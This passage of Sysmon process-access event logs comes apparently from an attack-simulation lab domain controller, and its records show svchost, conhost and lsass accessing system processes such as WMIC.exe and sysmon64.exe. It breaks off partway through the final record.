{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5403,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5404,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5405,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5406,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5407,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.049\r\nSourceProcessGUID: {41C8662E-20CF-5F25-0000-00104CF50700}\r\nSourceProcessId: 4536\r\nSourceThreadId: 4616\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-001058BB0800}\r\nTargetProcessId: 4312\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.049","SourceProcessGUID":"{41C8662E-20CF-5F25-0000-00104CF50700}","SourceProcessId":"4536","SourceThreadId":"4616","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-001058BB0800}","TargetProcessId":"4312","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5408,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-001058BB0800}\r\nTargetProcessId: 4312\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-001058BB0800}","TargetProcessId":"4312","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5409,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.049\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-001058BB0800}\r\nTargetProcessId: 4312\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.049","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-001058BB0800}","TargetProcessId":"4312","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5410,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.049\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-001058BB0800}\r\nTargetProcessId: 4312\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.049","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-001058BB0800}","TargetProcessId":"4312","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5411,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.112\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 